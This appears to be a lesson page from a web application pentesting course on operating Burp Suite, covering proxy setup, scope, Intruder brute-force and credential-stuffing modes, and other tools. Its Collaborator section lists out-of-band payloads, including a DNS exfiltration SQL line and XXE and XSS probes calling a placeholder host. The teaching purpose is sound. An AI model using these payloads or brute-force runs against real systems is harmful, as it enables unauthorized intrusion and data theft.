Certified Web Application Pentester
Foundation & Lab Build Up 0/3 Conquering BurpSuite 0/1 Acquiring Dev Tools for Pentesting 0/1 Proxy Configuration & Interception 0/1 Introduction to OWASP Top 10 0/1 Web Security Testing Guide Framework 0/1 Essentials CLI Tools 0/1 Pentest Methodology and Workflow 0/1 Reconnaissance and Information Gathering 0/8 Enumeration & Mapping Bugs 0/10 Attacking Authentication Flow 0/1
← Certified Web Application Pentester

Conquering BurpSuite

Task 1
BurpSuite Mastery

1. Burp Suite Overview

Burp Suite is the industry-standard web application security testing tool. It operates as an intercepting proxy between the browser and the target application.

Architecture

Browser --> Burp Proxy (127.0.0.1:8080) --> Target Web Application
                |
                +-- Proxy (intercept/modify requests)
                +-- Target (scope definition)
                +-- Intruder (automated attacks)
                +-- Repeater (manual request manipulation)
                +-- Scanner (automated vulnerability detection) [Pro]
                +-- Decoder (encoding/decoding)
                +-- Comparer (diff responses)
                +-- Sequencer (entropy analysis)
                +-- Collaborator (out-of-band testing) [Pro]
                +-- Extensions (BApps)

2. Proxy Configuration

2.1 Browser Setup

# Firefox Manual Proxy Configuration
HTTP Proxy: 127.0.0.1   Port: 8080
SSL Proxy:  127.0.0.1   Port: 8080
Check: "Use this proxy for all protocols"

# Exclude from proxy
localhost, 127.0.0.1

2.2 CA Certificate

  1. With proxy enabled, browse to http://burpsuite
  2. Click "CA Certificate" to download
  3. Firefox: Preferences → Privacy & Security → Certificates → Import
  4. Chrome: Settings → Security → Manage Certificates → Import

2.3 Mobile Proxy Setup

# Android
Settings → Wi-Fi → Long press network → Modify → Advanced → Proxy: Manual
Proxy hostname: YOUR_BURP_IP
Proxy port: 8080
# Install CA cert: Settings → Security → Install from storage

# iOS
Settings → Wi-Fi → (i) icon → HTTP Proxy → Manual
Server: YOUR_BURP_IP
Port: 8080
# Install CA cert: Browse to http://burpsuite on device

3. Target Scope Configuration

Setting proper scope prevents testing out-of-scope targets:

Target → Scope → Add:
  Protocol: Any
  Host or IP: target.com
  Port: Any
  File: ^/.*

# Include subdomains
  Host: .*\.target\.com$

# Exclude specific paths
  Protocol: Any
  Host: target.com
  File: ^/logout$

Proxy → Options → Intercept Client Requests → Enable "And URL is in target scope"

4. Intruder Attack Types

4.1 Sniper

Single payload set, inserted one position at a time.

POST /login HTTP/1.1
username=§admin§&password=§password§

Payload set 1: [admin, root, test, user]

Iteration 1: username=admin&password=password
Iteration 2: username=root&password=password
Iteration 3: username=test&password=password
Iteration 4: username=user&password=password
Iteration 5: username=admin&password=admin
Iteration 6: username=admin&password=root
...

Use case: Testing one parameter at a time (fuzzing, enumeration)

4.2 Battering Ram

Single payload set, same value in all positions simultaneously.

POST /login HTTP/1.1
username=§payload§&password=§payload§

Payload: [admin, test, root]

Iteration 1: username=admin&password=admin
Iteration 2: username=test&password=test
Iteration 3: username=root&password=root

Use case: When same value goes in multiple places

4.3 Pitchfork

Multiple payload sets, one per position, iterated in parallel.

POST /login HTTP/1.1
username=§pos1§&password=§pos2§

Set 1: [admin, user1, user2]
Set 2: [admin123, pass1, pass2]

Iteration 1: username=admin&password=admin123
Iteration 2: username=user1&password=pass1
Iteration 3: username=user2&password=pass2

Use case: Credential stuffing with known username

pairs

4.4 Cluster Bomb

Multiple payload sets, all combinations tested.

POST /login HTTP/1.1
username=§pos1§&password=§pos2§

Set 1: [admin, user1]
Set 2: [pass1, pass2, pass3]

Iteration 1: username=admin&password=pass1
Iteration 2: username=admin&password=pass2
Iteration 3: username=admin&password=pass3
Iteration 4: username=user1&password=pass1
Iteration 5: username=user1&password=pass2
Iteration 6: username=user1&password=pass3

Use case: Brute forcing when username and password are unknown

4.5 Grep Match for Results Analysis

Intruder → Options → Grep - Match:
  Add: "Invalid credentials"
  Add: "Login successful"
  Add: "Welcome"
  Add: "dashboard"

# Filter results by response length, status code, or grep match
# Different response length often indicates successful login

5. Repeater

Manual request manipulation tool for precision testing:

# Right-click any request → Send to Repeater
# Or Ctrl+R

# Use cases:
# 1. SQLi testing - modify parameters and observe responses
# 2. XSS payload testing - try different payloads
# 3. Authentication bypass - manipulate tokens/cookies
# 4. API testing - change methods, headers, body
# 5. IDOR testing - change IDs and compare responses

# Tips:
# - Use Ctrl+Space for auto-complete
# - Right-click → Change request method (GET↔POST)
# - Use tabs to test multiple variations
# - Inspector panel for easy parameter editing

6. Decoder

# Encoding operations:
# URL encoding: admin → %61%64%6d%69%6e
# HTML encoding: <script> → &lt;script&gt;
# Base64: admin:password → YWRtaW46cGFzc3dvcmQ=
# Hex: admin → 61646d696e
# ASCII hex: A → 41
# Gzip/deflate compression

# Decoding chain example:
# Input: JTNDc2NyaXB0JTNFYWxlcnQoMSklM0MlMkZzY3JpcHQlM0U=
# Step 1: Base64 decode → %3Cscript%3Ealert(1)%3C%2Fscript%3E
# Step 2: URL decode → <script>alert(1)</script>

# Smart Decode: automatically identifies and decodes

7. Comparer

# Compare two responses to find differences
# Use cases:
# - Different user roles accessing same endpoint
# - Before/after parameter modification
# - Identifying subtle differences in login responses (user enumeration)

# Right-click response → Send to Comparer
# Compare by words or bytes
# Highlights additions, modifications, deletions

8. Sequencer

# Analyze randomness of session tokens
# Steps:
# 1. Capture a request that sets a session token
# 2. Right-click → Send to Sequencer
# 3. Configure the token location (cookie, parameter)
# 4. Start live capture (collect 10,000+ tokens)
# 5. Analyze results

# Results analysis:
# - Overall quality: Excellent (>112 bits), Reasonable (>56 bits), Poor (<56 bits)
# - Bit-level analysis shows entropy per position
# - Character-level analysis shows distribution
# - Identifies predictable patterns

9. Essential Burp Extensions

ExtensionPurpose
AutorizeAutomated authorization testing (IDOR, privilege esc)
Active Scan++Enhanced active scanning capabilities
Param MinerDiscover hidden parameters and headers
Logger++Advanced HTTP logging and filtering
Turbo IntruderHigh-speed request sending for race conditions
JSON BeautifierFormat JSON in requests/responses
Retire.jsIdentify vulnerable JavaScript libraries
HackvertorTag-based encoding/decoding in requests
InQLGraphQL introspection and testing
JWT EditorJWT token manipulation and attacks
Collaborator EverywhereInject Collaborator payloads everywhere
SAML RaiderSAML assertion manipulation
HTTP Request SmugglerDetect request smuggling vulnerabilities
FreddyDeserialization vulnerability detection
Software Vulnerability ScannerDetect known CVEs

Installation: Extender → BApp Store → Search and Install

10. Session Handling Rules and Macros

Macros

# Use macros to automate multi-step actions:
# 1. Project Options → Sessions → Macros → Add
# 2. Record the sequence (e.g., login flow)
# 3. Configure parameter extraction from responses

# Example: Auto-login macro
# Step 1: GET /login (extract CSRF token)
# Step 2: POST /login (send credentials + CSRF token)
# Step 3: Extract session cookie from response

Session Handling Rules

# Project Options → Sessions → Session Handling Rules → Add
# Rule actions:
# - Run macro (re-authenticate if session expires)
# - Check session validity
# - Update current request parameters
# - Use cookies from Burp's cookie jar

# Scope: Define which tools/URLs use this rule

11. Match and Replace Rules

# Proxy → Options → Match and Replace

# Useful rules:
# 1. Remove security headers for testing:
#    Match: X-Frame-Options:.*
#    Replace: (empty)
#    Type: Response header

# 2. Add custom headers:
#    Match: (empty)
#    Replace: X-Forwarded-For: 127.0.0.1
#    Type: Request header

# 3. Modify User-Agent:
#    Match: User-Agent:.*
#    Replace: User-Agent: Googlebot/2.1
#    Type: Request header

# 4. Change response for testing:
#    Match: "isAdmin":false
#    Replace: "isAdmin":true
#    Type: Response body

12. Collaborator (Pro)

# Burp Collaborator provides an external server for out-of-band testing
# Burp → Collaborator → Copy to clipboard

# Use cases:
# - Blind SSRF: fetch http://COLLABORATOR_URL
# - Blind XSS: <img src=http://COLLABORATOR_URL>
# - Blind XXE: <!ENTITY xxe SYSTEM "http://COLLABORATOR_URL">
# - Blind SQLi: LOAD_FILE('\\\\COLLABORATOR_URL\\a')
# - DNS-based exfiltration: SELECT load_file(concat('\\\\',version(),'.COLLABORATOR_URL\\a'))

# Poll for interactions:
# Collaborator tab → Poll now
# Shows DNS lookups, HTTP requests, SMTP interactions

13. Tips and Tricks

# Keyboard shortcuts:
# Ctrl+R: Send to Repeater
# Ctrl+I: Send to Intruder
# Ctrl+U: URL encode selection
# Ctrl+Shift+U: URL decode selection
# Ctrl+B: Base64 encode
# Ctrl+Shift+B: Base64 decode

# Performance:
# - Disable Intruder throttling for speed (but be careful)
# - Use resource pool for concurrent requests
# - Reduce maximum memory in startup for stability

# Organization:
# - Use target scope strictly
# - Add comments to interesting requests
# - Highlight requests with colors
# - Use project files to save progress
# - Export specific items for reporting

# Bambda filters (Proxy history):
# return requestResponse.request().hasParameter("token", HttpParameterType.URL);
# return requestResponse.response().statusCode() == 403;
# return requestResponse.request().path().contains("/api/");